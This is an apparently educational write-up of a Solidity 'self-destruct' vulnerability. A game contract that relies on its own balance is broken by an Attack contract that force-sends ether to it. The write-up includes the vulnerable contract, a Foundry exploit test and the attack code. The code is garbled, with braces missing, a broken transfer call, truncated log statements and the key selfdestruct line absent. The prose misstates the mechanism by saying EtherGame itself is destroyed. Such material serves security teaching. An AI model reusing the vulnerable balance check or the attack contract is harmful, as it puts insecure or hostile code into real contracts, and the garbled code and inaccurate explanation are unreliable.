Name: Self-Destruct Vulnerability

Description: The EtherGame Self-Destruct Vulnerability is a flaw in the smart contract code that allows an attacker to disrupt the game by causing the EtherGame contract to self-destruct (using the selfdestruct opcode). The vulnerability arises due to the dos function in the Attack contract, which performs a self-destruct operation on the EtherGame contract after receiving a significant amount of Ether. As a result of the self-destruct, the EtherGame contract's functionality is permanently disabled, making it impossible for anyone to deposit or claim the winner's reward.


  1. Deploy EtherGame
  2. Players (say Alice and Bob) decides to play, deposits 1 Ether each.
  3. Deploy Attack with address of EtherGame
  4. Call Attack.attack sending 5 ether. This will break the game No one can become the winner.

What happened? Attack forced the balance of EtherGame to equal 7 ether. Now no one can deposit and the winner cannot be set. Due to missing or insufficient access controls, malicious parties can self-destruct the contract. The selfdestruct(address) function removes all bytecode from the contract address and sends all ether stored to the specified address.

Mitigation: Instead of relying on this.balance to track the deposited Ether,use a state variable to keep track of the total deposited amount.

EtherGame Contract:

contract EtherGame {
    uint public constant targetAmount = 7 ether;
    address public winner;

    function deposit() public payable {
        require(msg.value == 1 ether, "You can only send 1 Ether");

        uint balance = address(this).balance; // vulnerable
        require(balance <= targetAmount, "Game is over");

        if (balance == targetAmount) {
            winner = msg.sender;

    function claimReward() public {
        require(msg.sender == winner, "Not winner");

        (bool sent, ) ={value: address(this).balance}("");
        require(sent, "Failed to send Ether");

How to Test:

forge test --contracts src/test/Selfdestruct.sol -vvvv

// Test function for a scenario where selfdestruct is used.
function testSelfdestruct() public {
    // Log Alice's balance.
    console.log("Alice balance", alice.balance);
    // Log Eve's balance.
    console.log("Eve balance", eve.balance);

    // Log the start of Alice's deposit.
    console.log("Alice deposit 1 Ether...");
    // Set the message sender to Alice.
    // Alice deposits 1 ether to the EtherGameContract.
    EtherGameContract.deposit{value: 1 ether}();

    // Log the start of Eve's deposit.
    console.log("Eve deposit 1 Ether...");
    // Set the message sender to Eve.
    // Eve deposits 1 ether to the EtherGameContract.
    EtherGameContract.deposit{value: 1 ether}();

    // Log the balance of the EtherGameContract.
        "Balance of EtherGameContract",

    // Log the start of the attack.
    // Create a new instance of the Attack contract with EtherGameContract as a parameter.
    AttackerContract = new Attack(EtherGameContract);
    // Send 5 ether to the dos function of the AttackerContract.
    AttackerContract.dos{value: 5 ether}();

    // Log the new balance of the EtherGameContract after the attack.
        "Balance of EtherGameContract",
    // Log the completion of the exploit.
    console.log("Exploit completed, Game is over");
    // Try to deposit 1 ether to the EtherGameContract. This call will fail as the contract has been destroyed.
    EtherGameContract.deposit{value: 1 ether}(); // This call will fail due to contract destroyed.

// Contract to attack the EtherGame contract.
contract Attack {
    // The EtherGame contract to be attacked.
    EtherGame etherGame;

    // Constructor to set the EtherGame contract.
    constructor(EtherGame _etherGame) {
        etherGame = _etherGame;

    // The function to perform the attack.
    function dos() public payable {
        // Break the game by sending ether so that the game balance is >= 7 ether.

        // Cast the EtherGame contract address to a payable address.
        address payable addr = payable(address(etherGame));
        // Self-destruct the contract and send its balance to the EtherGame contract.

Red box: exploited successful, game is over.